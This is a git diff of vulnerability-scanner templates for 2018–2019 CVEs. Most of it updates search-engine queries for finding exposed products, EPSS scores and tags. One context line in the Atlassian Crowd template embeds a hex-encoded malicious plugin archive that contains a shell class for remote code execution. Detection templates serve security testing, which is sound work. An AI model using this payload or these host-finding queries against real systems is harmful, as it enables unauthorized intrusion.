a/http/cves/2018/CVE-2018-7282.yaml b/http/cves/2018/CVE-2018-7282.yaml index ea5dbc252f..ddedd992b0 100644 --- a/http/cves/2018/CVE-2018-7282.yaml +++ b/http/cves/2018/CVE-2018-7282.yaml @@ -25,10 +25,12 @@ info: max-request: 1 vendor: titool product: printmonitor - shodan-query: title:"PrintMonitor" - product": printmonitor + shodan-query: + - title:"PrintMonitor" + - http.title:"printmonitor" fofa-query: title="printmonitor" google-query: intitle:"printmonitor" + product": printmonitor tags: cve2018,cve,sqli,printmonitor,unauth,titool variables: username: "{{rand_base(6)}}" diff --git a/http/cves/2018/CVE-2018-7314.yaml b/http/cves/2018/CVE-2018-7314.yaml index 51ebd26670..a9ca01dec4 100644 --- a/http/cves/2018/CVE-2018-7314.yaml +++ b/http/cves/2018/CVE-2018-7314.yaml @@ -24,9 +24,10 @@ info: vendor: mlwebtechnologies product: prayercenter framework: joomla\! - fofa-query: app="Joomla!-网站安装" - tags: cve,cve2018,joomla,sqli - + fofa-query: + - app="Joomla!-网站安装" + - app="joomla!-网站安装" + tags: cve,cve2018,joomla,sqli,joomla\!,mlwebtechnologies variables: num: "{{rand_int(800000000, 1000000000)}}" diff --git a/http/cves/2018/CVE-2018-7422.yaml b/http/cves/2018/CVE-2018-7422.yaml index 2146473a79..e9416713ee 100644 --- a/http/cves/2018/CVE-2018-7422.yaml +++ b/http/cves/2018/CVE-2018-7422.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2018-7422 cwe-id: CWE-22 epss-score: 0.94711 - epss-percentile: 0.99202 + epss-percentile: 0.99255 cpe: cpe:2.3:a:siteeditor:site_editor:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2018/CVE-2018-7600.yaml b/http/cves/2018/CVE-2018-7600.yaml index 300f5b46da..4ce8ed79e0 100644 --- a/http/cves/2018/CVE-2018-7600.yaml +++ b/http/cves/2018/CVE-2018-7600.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: drupal product: drupal - shodan-query: http.component:"drupal" + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" tags: cve,cve2018,drupal,rce,kev,vulhub,intrusive http: diff --git a/http/cves/2018/CVE-2018-7602.yaml b/http/cves/2018/CVE-2018-7602.yaml index fdc40e94e4..7d74d88633 100644 --- a/http/cves/2018/CVE-2018-7602.yaml +++ b/http/cves/2018/CVE-2018-7602.yaml @@ -26,7 +26,9 @@ info: max-request: 4 vendor: drupal product: drupal - shodan-query: http.component:"drupal" + shodan-query: + - http.component:"drupal" + - cpe:"cpe:2.3:a:drupal:drupal" tags: cve,cve2018,drupal,authenticated,kev,vulhub,edb http: diff --git a/http/cves/2018/CVE-2018-7653.yaml b/http/cves/2018/CVE-2018-7653.yaml index 4304af2aef..6171168059 100644 --- a/http/cves/2018/CVE-2018-7653.yaml +++ b/http/cves/2018/CVE-2018-7653.yaml @@ -25,8 +25,12 @@ info: max-request: 1 vendor: yzmcms product: yzmcms - shodan-query: title:"YzmCMS" - fofa-query: title="YzmCMS" + shodan-query: + - title:"YzmCMS" + - http.title:"yzmcms" + fofa-query: + - title="YzmCMS" + - title="yzmcms" google-query: intitle:"yzmcms" tags: cve,cve2018,packetstorm,yzmcms,cms,xss diff --git a/http/cves/2018/CVE-2018-7700.yaml b/http/cves/2018/CVE-2018-7700.yaml index 4108c5e25d..8952662f24 100644 --- a/http/cves/2018/CVE-2018-7700.yaml +++ b/http/cves/2018/CVE-2018-7700.yaml @@ -13,20 +13,27 @@ info: reference: - https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ - https://nvd.nist.gov/vuln/detail/CVE-2018-7700 + - https://github.com/0ps/pocassistdb + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H cvss-score: 8.8 cve-id: CVE-2018-7700 cwe-id: CWE-352 - epss-score: 0.73235 - epss-percentile: 0.97827 + epss-score: 0.50599 + epss-percentile: 0.97528 cpe: cpe:2.3:a:dedecms:dedecms:5.7:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dedecms product: dedecms - fofa-query: body="dedecms" - shodan-query: http.html:"dedecms" + shodan-query: + - http.html:"dedecms" + - cpe:"cpe:2.3:a:dedecms:dedecms" + fofa-query: + - body="dedecms" + - app="dedecms" tags: cve,cve2018,dedecms,rce http: diff --git a/http/cves/2018/CVE-2018-8006.yaml b/http/cves/2018/CVE-2018-8006.yaml index 7c5ec277eb..b3de60671d 100644 --- a/http/cves/2018/CVE-2018-8006.yaml +++ b/http/cves/2018/CVE-2018-8006.yaml @@ -32,7 +32,9 @@ info: max-request: 1 vendor: apache product: activemq - shodan-query: cpe:"cpe:2.3:a:apache:activemq" + shodan-query: + - cpe:"cpe:2.3:a:apache:activemq" + - product:"activemq openwire transport" tags: cve2018,cve,apache,activemq,xss http: diff --git a/http/cves/2018/CVE-2018-8033.yaml b/http/cves/2018/CVE-2018-8033.yaml index 966921ddf1..87f70b3915 100644 --- a/http/cves/2018/CVE-2018-8033.yaml +++ b/http/cves/2018/CVE-2018-8033.yaml @@ -28,8 +28,12 @@ info: max-request: 1 vendor: apache product: ofbiz - fofa-query: body="ofbiz" - shodan-query: http.html:"ofbiz" + shodan-query: + - http.html:"ofbiz" + - ofbiz.visitor= + fofa-query: + - body="ofbiz" + - app="apache_ofbiz" tags: cve,cve2018,apache,ofbiz,xxe http: diff --git a/http/cves/2018/CVE-2018-8727.yaml b/http/cves/2018/CVE-2018-8727.yaml index f1657ce6af..808deae28a 100644 --- a/http/cves/2018/CVE-2018-8727.yaml +++ b/http/cves/2018/CVE-2018-8727.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2018-8727 cwe-id: CWE-22 epss-score: 0.01105 - epss-percentile: 0.8294 + epss-percentile: 0.84452 cpe: cpe:2.3:a:mirasys:dvms_workstation:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8770.yaml b/http/cves/2018/CVE-2018-8770.yaml index 93bc03125b..8cbd4e73e9 100644 --- a/http/cves/2018/CVE-2018-8770.yaml +++ b/http/cves/2018/CVE-2018-8770.yaml @@ -14,13 +14,14 @@ info: - https://www.exploit-db.com/exploits/44495/ - https://github.com/Kyhvedn/CVE_Description/blob/master/Cobub_Razor_0.8.0_more_physical_path_leakage.md - https://nvd.nist.gov/vuln/detail/CVE-2018-8770 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2018-8770 cwe-id: CWE-200 - epss-score: 0.00197 - epss-percentile: 0.57527 + epss-score: 0.00196 + epss-percentile: 0.57017 cpe: cpe:2.3:a:cobub:razor:0.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2018/CVE-2018-8823.yaml b/http/cves/2018/CVE-2018-8823.yaml index 342b8ce4f8..5ada80fe34 100644 --- a/http/cves/2018/CVE-2018-8823.yaml +++ b/http/cves/2018/CVE-2018-8823.yaml @@ -27,7 +27,7 @@ info: product: responsive_mega_menu_pro framework: prestashop shodan-query: http.component:"prestashop" - tags: cve,cve2018,prestashop,rce,sqli + tags: cve,cve2018,prestashop,rce,sqli,responsive_mega_menu_pro_project variables: num: "999999999" diff --git a/http/cves/2018/CVE-2018-9845.yaml b/http/cves/2018/CVE-2018-9845.yaml index 22630800df..49b400f20f 100644 --- a/http/cves/2018/CVE-2018-9845.yaml +++ b/http/cves/2018/CVE-2018-9845.yaml @@ -14,13 +14,14 @@ info: - https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b - https://nvd.nist.gov/vuln/detail/CVE-2018-9845 - https://github.com/ether/etherpad-lite/blob/develop/CHANGELOG.md + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2018-9845 cwe-id: CWE-178 epss-score: 0.01393 - epss-percentile: 0.84966 + epss-percentile: 0.86371 cpe: cpe:2.3:a:etherpad:etherpad_lite:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-0193.yaml b/http/cves/2019/CVE-2019-0193.yaml index 83b03912fd..66a384ae25 100644 --- a/http/cves/2019/CVE-2019-0193.yaml +++ b/http/cves/2019/CVE-2019-0193.yaml @@ -28,9 +28,16 @@ info: max-request: 2 vendor: apache product: solr - shodan-query: cpe:"cpe:2.3:a:apache:solr" - fofa-query: title="solr admin" - google-query: intitle:"apache solr" + shodan-query: + - cpe:"cpe:2.3:a:apache:solr" + - http.title:"apache solr" + - http.title:"solr admin" + fofa-query: + - title="solr admin" + - title="apache solr" + google-query: + - intitle:"apache solr" + - intitle:"solr admin" tags: cve2019,cve,apache,rce,solr,oast,kev,vulhub http: diff --git a/http/cves/2019/CVE-2019-0221.yaml b/http/cves/2019/CVE-2019-0221.yaml index 4e292cc145..06215e719a 100644 --- a/http/cves/2019/CVE-2019-0221.yaml +++ b/http/cves/2019/CVE-2019-0221.yaml @@ -28,8 +28,14 @@ info: max-request: 2 vendor: apache product: tomcat - shodan-query: title:"Apache Tomcat" - fofa-query: body="apache tomcat" + shodan-query: + - title:"Apache Tomcat" + - http.title:"apache tomcat" + - http.html:"apache tomcat" + - cpe:"cpe:2.3:a:apache:tomcat" + fofa-query: + - body="apache tomcat" + - title="apache tomcat" google-query: intitle:"apache tomcat" tags: cve2019,cve,apache,xss,tomcat,seclists,edb variables: diff --git a/http/cves/2019/CVE-2019-0230.yaml b/http/cves/2019/CVE-2019-0230.yaml index 4070e89092..0d6557d0e7 100644 --- a/http/cves/2019/CVE-2019-0230.yaml +++ b/http/cves/2019/CVE-2019-0230.yaml @@ -20,15 +20,21 @@ info: cvss-score: 9.8 cve-id: CVE-2019-0230 cwe-id: CWE-1321 - epss-score: 0.94817 - epss-percentile: 0.99114 + epss-score: 0.95364 + epss-percentile: 0.99359 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: struts - shodan-query: http.html:"apache struts" - fofa-query: body="struts problem report" + shodan-query: + - http.html:"apache struts" + - http.title:"struts2 showcase" + - http.html:"struts problem report" + fofa-query: + - body="struts problem report" + - title="struts2 showcase" + - body="apache struts" google-query: intitle:"struts2 showcase" tags: cve,cve2019,tenable,packetstorm,struts,rce,apache variables: diff --git a/http/cves/2019/CVE-2019-10092.yaml b/http/cves/2019/CVE-2019-10092.yaml index 5e0400ae6b..f560fa7e6f 100644 --- a/http/cves/2019/CVE-2019-10092.yaml +++ b/http/cves/2019/CVE-2019-10092.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: apache product: http_server - shodan-query: cpe:"cpe:2.3:a:apache:http_server" + shodan-query: + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve,cve2019,apache,htmli,injection http: diff --git a/http/cves/2019/CVE-2019-10098.yaml b/http/cves/2019/CVE-2019-10098.yaml index 2e00f421b2..65128eacf7 100644 --- a/http/cves/2019/CVE-2019-10098.yaml +++ b/http/cves/2019/CVE-2019-10098.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: apache product: http_server - shodan-query: cpe:"cpe:2.3:a:apache:http_server" + shodan-query: + - cpe:"cpe:2.3:a:apache:http_server" + - apache 2.4.49 tags: cve,cve2019,redirect,apache,server http: diff --git a/http/cves/2019/CVE-2019-1010287.yaml b/http/cves/2019/CVE-2019-1010287.yaml index 8b5433f66f..0149d63c0d 100644 --- a/http/cves/2019/CVE-2019-1010287.yaml +++ b/http/cves/2019/CVE-2019-1010287.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2019-1010287 cwe-id: CWE-79 epss-score: 0.00129 - epss-percentile: 0.46774 + epss-percentile: 0.47703 cpe: cpe:2.3:a:timesheet_next_gen_project:timesheet_next_gen:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-10405.yaml b/http/cves/2019/CVE-2019-10405.yaml index c3d9302ed4..eef7fbedec 100644 --- a/http/cves/2019/CVE-2019-10405.yaml +++ b/http/cves/2019/CVE-2019-10405.yaml @@ -26,7 +26,10 @@ info: max-request: 2 vendor: jenkins product: jenkins - shodan-query: http.favicon.hash:81586312 + shodan-query: + - http.favicon.hash:81586312 + - cpe:"cpe:2.3:a:jenkins:jenkins" + - product:"jenkins" fofa-query: icon_hash=81586312 tags: cve,cve2019,jenkins diff --git a/http/cves/2019/CVE-2019-10717.yaml b/http/cves/2019/CVE-2019-10717.yaml index 5911a3c978..909292b0a2 100644 --- a/http/cves/2019/CVE-2019-10717.yaml +++ b/http/cves/2019/CVE-2019-10717.yaml @@ -29,7 +29,9 @@ info: max-request: 1 vendor: dotnetblogengine product: blogengine.net - shodan-query: http.html:"Blogengine.net" + shodan-query: + - http.html:"Blogengine.net" + - http.html:"blogengine.net" fofa-query: body="blogengine.net" tags: cve,cve2019,seclists,blogengine,lfi,traversal,dotnetblogengine diff --git a/http/cves/2019/CVE-2019-10758.yaml b/http/cves/2019/CVE-2019-10758.yaml index 23624a316b..54b91783c0 100644 --- a/http/cves/2019/CVE-2019-10758.yaml +++ b/http/cves/2019/CVE-2019-10758.yaml @@ -26,7 +26,9 @@ info: vendor: mongo-express_project product: mongo-express framework: node.js - shodan-query: http.title:"Mongo Express" + shodan-query: + - http.title:"Mongo Express" + - http.title:"mongo express" fofa-query: title="mongo express" google-query: intitle:"mongo express" tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js diff --git a/http/cves/2019/CVE-2019-11248.yaml b/http/cves/2019/CVE-2019-11248.yaml index 788e9a272d..25db910825 100644 --- a/http/cves/2019/CVE-2019-11248.yaml +++ b/http/cves/2019/CVE-2019-11248.yaml @@ -29,7 +29,9 @@ info: vendor: kubernetes product: kubernetes shodan-query: http.title:"kubernetes web view" - fofa-query: title="kubernetes web view" + fofa-query: + - title="kubernetes web view" + - app="kubernetes-enterprise-manager" google-query: intitle:"kubernetes web view" tags: cve2019,cve,debug,kubernetes,kubelet,devops,unauth,disclosure diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 5930885d19..2aca65ebaf 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -28,7 +28,9 @@ info: max-request: 2 vendor: carel product: pcoweb_card_firmware - shodan-query: http.html:"pCOWeb" + shodan-query: + - http.html:"pCOWeb" + - http.html:"pcoweb" fofa-query: body="pcoweb" tags: cve,cve2019,pcoweb,xss,carel,edb diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index 68d3c30a9a..5686a5b6a6 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -27,10 +27,14 @@ info: max-request: 1 vendor: ivanti product: connect_secure - shodan-query: http.html:"welcome.cgi?p=logo" - fofa-query: body="welcome.cgi?p=logo" + shodan-query: + - http.html:"welcome.cgi?p=logo" + - http.title:"ivanti connect secure" + fofa-query: + - body="welcome.cgi?p=logo" + - title="ivanti connect secure" google-query: intitle:"ivanti connect secure" - tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev + tags: packetstorm,cve,cve2019,pulsesecure,lfi,kev,ivanti http: - method: GET diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index 05f9053070..2369be800c 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: atlassian product: crowd - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" tags: cve,cve2019,packetstorm,kev,atlassian,rce,intrusive,unauth variables: plugin: '{{hex_decode("504b0304140000000800033f2557544c2527eb0000000402000014001c0061746c61737369616e2d706c7567696e2e786d6c555409000316dff66410e4f66475780b000104e803000004e80300007d91416ec3201045d7ce29107b20c91a23e50039c4044f53140c16e0a8bd7d260527ae5595dd7c66febc0f1a8a879c1d0431f9f9ea02bbe177cf6d1ca51dbccc9fe8bdc4af89b30023f6fcb4b4b33304b862e2acce6571c7945d0c3d3f72669f5d7fd9981da3a3eb8c70e12356a5aa90606c8bde5c0314101643c124c87082e22e1eb9296946ad7e66561e03669bdc5488c46c61473269b85aad1bdfe32d8439c8bddc6bb594955afdc2de753a63ba7b2c0d99f2f9e80aaf4ff8aafe798beee93a272f2814c50b4691aed55aa93d6bd80bd8db106362505823caaa9128dab089d6e9e59290b5dafe37890f504b03040a0000000000033f255700000000000000000000000004001c00636f6d2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000033f255700000000000000000000000008001c00636f6d2f63646c2f555409000316dff664bae3f66475780b000104e803000004e8030000504b03040a0000000000854225570000000000000000000000000e001c00636f6d2f63646c2f7368656c6c2f5554090003b9e4f664b9e4f66475780b000104e803000004e8030000504b0304140000000800bd422557a3de4c61670100004602000017001c00636f6d2f63646c2f7368656c6c2f6578702e636c617373555409000326e5f664b9e4f66475780b000104e803000004e80300008d51c94e0241107d25cb208c22e2bea05e0c18b1c1c4a8c17821b824440d183c237470cc3883330df25b5e347af003fc2863b5b870523be95a5ebfeaaa7efdfaf6fc02601bcb51849188611cc90826a298c4948169033384f09ee5586a9f1048676a8460d16d4a42bc6c39f2a4737329bdf3faa5cd48a8e91e4a45a8a4cbd7f56ebd277ce9756da9c495526d71c4a6da072af2b6237d55f893e6b75dc79705dd355aea35645b590c1898e5bcea76bc863cb074e788ecb537f465260c440ccc9998c70261b4582b653773f9dd6c3ebfb59333b06822852542a2e1de8846d316fe95b46dc1e584d4efd310929a202c571c9f7e0f4358fddf2308c32da92e3c4b498f309dce94bf6e3bf32ce7f3a030d064006669ef744098ec4b2becbad31255c59416ab831584f8f7f41a026909d80e73b6c89ed887d61e41f71cb06e6cc31fa0b631985ca2a969f601f6e6fa138608e38107047f2aa27c0ae6c5381ae128c8f828eff847cbb177504b03041400000008003a422557483e79dabf0000000f01000016001c00636f6d2f63646c2f7368656c6c2f6578702e6a617661555409000330e4f66430e4f66475780b000104e803000004e8030000558e416bc3300c85effe15a2a7642ca2290c36721c61eda9d0417bf61cd1787363d75293c0c87fafdbf5903d1008bdf73d14b4f9d14702e34f681a87dc92739552f6147c14f8d6bd1e9129f68e045b91804fd5dc44eb71b3ad474341acef12192e5fce1a304e33038d218d50d730ac13fdf9d704bf4a41d223db7bdb40e33f48b2596847e70bb140a4f333fcbb73f01d5332380769a31f18663fa472782825f0487288562866390eb7255bbcefeb62b52cdf8ab27c795d2ef2ea0e4c6a5257504b01021e03140000000800033f2557544c2527eb00000004020000140018000000000001000000fd810000000061746c61737369616e2d706c7567696e2e786d6c555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000040018000000000000001000fd4139010000636f6d2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000033f2557000000000000000000000000080018000000000000001000fd4177010000636f6d2f63646c2f555405000316dff66475780b000104e803000004e8030000504b01021e030a0000000000854225570000000000000000000000000e0018000000000000001000fd41b9010000636f6d2f63646c2f7368656c6c2f5554050003b9e4f66475780b000104e803000004e8030000504b01021e03140000000800bd422557a3de4c616701000046020000170018000000000000000000b48101020000636f6d2f63646c2f7368656c6c2f6578702e636c617373555405000326e5f66475780b000104e803000004e8030000504b01021e031400000008003a422557483e79dabf0000000f010000160018000000000001000000b481b9030000636f6d2f63646c2f7368656c6c2f6578702e6a617661555405000330e4f66475780b000104e803000004e8030000504b05060000000006000600ff010000c80400000000")}}' diff --git a/http/cves/2019/CVE-2019-11581.yaml b/http/cves/2019/CVE-2019-11581.yaml index 89c27951ee..a8456d0ef5 100644 --- a/http/cves/2019/CVE-2019-11581.yaml +++ b/http/cves/2019/CVE-2019-11581.yaml @@ -27,7 +27,11 @@ info: max-request: 1 vendor: atlassian product: jira - shodan-query: http.component:"Atlassian Jira" + shodan-query: + - http.component:"Atlassian Jira" + - http.component:"atlassian jira" + - http.component:"atlassian confluence" + - cpe:"cpe:2.3:a:atlassian:jira" tags: cve,cve2019,atlassian,jira,ssti,rce,kev http: diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index e699734f44..31a83b5fa4 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -20,13 +20,13 @@ info: cvss-score: 6.1 cve-id: CVE-2019-12581 cwe-id: CWE-79 - epss-score: 0.00642 - epss-percentile: 0.7705 - cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* + epss-score: 0.00358 + epss-percentile: 0.7209 + cpe: cpe:2.3:h:zyxel:uag2100:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zyxel - product: uag2100_firmware + product: uag2100 shodan-query: http.title:"ZyWall" fofa-query: title="zywall" google-query: intitle:"zywall" diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index 51fcfdcb65..5129fec867 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -28,9 +28,19 @@ info: max-request: 2 vendor: icewarp product: mail_server - shodan-query: title:"icewarp" - google-query: Powered By IceWarp 10.4.4 - fofa-query: title="icewarp server administration" + shodan-query: + - title:"icewarp" + - http.title:"icewarp server administration" + - http.title:"icewarp" + - cpe:"cpe:2.3:a:icewarp:mail_server" + fofa-query: + - title="icewarp server administration" + - title="icewarp" + google-query: + - Powered By IceWarp 10.4.4 + - intitle:"icewarp" + - powered by icewarp 10.4.4 + - intitle:"icewarp server administration" tags: cve,cve2019,packetstorm,lfi,icewarp http: diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index d5b46be579..f196816b12 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -27,8 +27,13 @@ info: max-request: 1 vendor: phpmyadmin product: phpmyadmin - shodan-query: http.title:"phpmyadmin" - fofa-query: title="phpmyadmin" + shodan-query: + - http.title:"phpmyadmin" + - http.component:"phpmyadmin" + - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin" + fofa-query: + - title="phpmyadmin" + - body="pma_servername" && body="4.8.4" google-query: intitle:"phpmyadmin" hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" tags: cve2019,cve,csrf,edb,phpmyadmin diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index d930b0f553..4d0453a4b4 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -27,7 +27,9 @@ info: max-request: 1 vendor: livezilla product: livezilla - shodan-query: http.html:LiveZilla + shodan-query: + - http.html:LiveZilla + - http.html:livezilla fofa-query: body=livezilla tags: cve,cve2019,xss,edb,packetstorm,livezilla diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml index 700fcf5769..ada8b5bb89 100644 --- a/http/cves/2019/CVE-2019-12985.yaml +++ b/http/cves/2019/CVE-2019-12985.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: citrix product: netscaler_sd-wan - shodan-query: http.title:"Citrix SD-WAN" + shodan-query: + - http.title:"Citrix SD-WAN" + - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" tags: cve,cve2019,citrix,rce,unauth,oast,tenable diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index ad13268299..527e8f032d 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: citrix product: netscaler_sd-wan - shodan-query: http.title:"Citrix SD-WAN" + shodan-query: + - http.title:"Citrix SD-WAN" + - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" tags: cve2019,cve,unauth,oast,tenable,citrix,rce diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index 1af5d51a6e..9154e3b1f0 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: citrix product: netscaler_sd-wan - shodan-query: http.title:"Citrix SD-WAN" + shodan-query: + - http.title:"Citrix SD-WAN" + - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" tags: cve,cve2019,citrix,rce,unauth,oast,tenable diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml index cfaeb96576..593e3a6d14 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -26,7 +26,9 @@ info: max-request: 2 vendor: citrix product: netscaler_sd-wan - shodan-query: http.title:"Citrix SD-WAN" + shodan-query: + - http.title:"Citrix SD-WAN" + - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" tags: cve,cve2019,rce,unauth,oast,tenable,citrix diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index 4029b91e8c..1daca6e287 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -27,7 +27,9 @@ info: max-request: 3 vendor: citrix product: netscaler_sd-wan - shodan-query: http.title:"Citrix SD-WAN" + shodan-query: + - http.title:"Citrix SD-WAN" + - http.title:"citrix sd-wan" fofa-query: title="citrix sd-wan" google-query: intitle:"citrix sd-wan" tags: cve,cve2019,citrix,rce,unauth,tenable,intrusive diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index 2ba58eff87..dd8f87ea9e 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -29,7 +29,7 @@ info: vendor: microsoft product: windows shodan-query: cpe:"cpe:2.3:o:microsoft:windows" - tags: cve,cve2019,lfi,odoo,packetstorm,palletsprojects + tags: cve,cve2019,lfi,odoo,packetstorm,palletsprojects,microsoft http: - method: GET diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index d8b02704ea..0631024a83 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -20,15 +20,14 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14470 cwe-id: CWE-79 - epss-score: 0.79707 - epss-percentile: 0.98209 + epss-score: 0.75122 + epss-percentile: 0.98153 cpe: cpe:2.3:a:instagram-php-api_project:instagram-php-api:-:*:*:*:*:*:*:* metadata: - max-request: 1 - vendor: instagram-php-api_project - product: instagram-php-api + max-request: 2 + vendor: "instagram-php-api_project" + product: "instagram-php-api" tags: cve,cve2019,wordpress,xss,wp-plugin,wpscan,packetstorm,instagram-php-api_project - flow: http(1) && http(2) http: diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index 75074e1d65..870be0ae90 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -29,8 +29,15 @@ info: max-request: 2 vendor: open-emr product: openemr - fofa-query: icon_hash=1971268439 - shodan-query: http.html:"openemr" + shodan-query: + - http.html:"openemr" + - http.title:"openemr" + - http.favicon.hash:1971268439 + fofa-query: + - icon_hash=1971268439 + - body="openemr" + - title="openemr" + - app="openemr" google-query: intitle:"openemr" tags: cve2019,cve,lfi,authenticated,edb,openemr,open-emr diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 6a212be265..b9be2286f8 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -28,9 +28,18 @@ info: max-request: 4 vendor: osticket product: osticket - shodan-query: title:"osTicket" - fofa-query: title="osticket" - google-query: intitle:"osticket" + shodan-query: + - title:"osTicket" + - http.title:"osticket" + - http.html:"powered by osticket" + - http.title:"osticket installer" + fofa-query: + - title="osticket" + - body="powered by osticket" + - title="osticket installer" + google-query: + - intitle:"osticket" + - intitle:"osticket installer" tags: cve,cve2019,packetstorm,osticket,xss,intrusive variables: user_name: "{{to_lower(rand_text_alphanumeric(6))}}" diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index 20802e8eb1..bb98ad1047 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -20,16 +20,22 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14974 cwe-id: CWE-79 - epss-score: 0.00217 - epss-percentile: 0.5978 + epss-score: 0.00173 + epss-percentile: 0.54331 cpe: cpe:2.3:a:sugarcrm:sugarcrm:9.0.0:*:*:*:enterprise:*:*:* metadata: max-request: 1 vendor: sugarcrm product: sugarcrm - 